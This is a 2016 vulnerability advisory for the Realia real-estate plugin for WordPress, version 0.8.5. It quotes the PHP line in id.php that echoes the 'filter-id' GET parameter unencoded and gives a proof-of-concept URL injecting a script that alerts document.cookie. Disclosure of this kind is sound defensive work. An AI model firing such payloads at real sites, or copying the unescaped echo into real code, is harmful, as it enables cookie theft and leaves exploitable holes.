WordPress Realia 0.8.5 Cross Site Scripting
Posted on 04 June 2016
Exploit Title : wordpress plugin 'Realia' (real estate solution) multiple XSS Vulnerability Author : WICS Date : 03/06/2016 Software Link : https://wordpress.org/plugins/realia/ Tested Version: 0.8.5 Overview: Realia is wordpress plugin which provides functionality of real estate service like search and sale of property. this script is having property search form which is vulnerable to Cross Site Scripting attack template codes inside directory realia emplateswidgetsfilter-fields are to display search form on user end. scripts (inside directory realia emplateswidgetsfilter-fields) are not encoding user supplied data in GET method variable before printing to search page and causing XSS vulnerability. for example in id.php, from line number 7 to 9, input text field code is given below <input type="text" name="filter-id" class="form-control" <?php if ( 'placeholders' == $input_titles ) : ?>placeholder="<?php echo __( 'Property ID', 'realia' ); ?>"<?php endif; ?> value="<?php echo ! empty( $_GET['filter-id'] ) ? $_GET['filter-id'] : ''; ?>" on line number 9, GET method variable filter-id value is getting pass directly and no XSS filter to clean the data which results in XSS POC http://127.0.0.1/wordpress/properties/?filter-contract=RENT&filter-id="><script>alert(document.cookie);</script>&filter-location=&filter-property-type=&filter-amenity=&filter-status=&filter-contract=&filter-material=&filter-price-from=1337'&filter-price-to=&filter-rooms=&filter-baths=&rent_filter-beds=&filter-year-built=&filter-home-area-from=&filter-home-area-to=&filter-lot-area-from=&filter-lot-area-to=&filter-garages=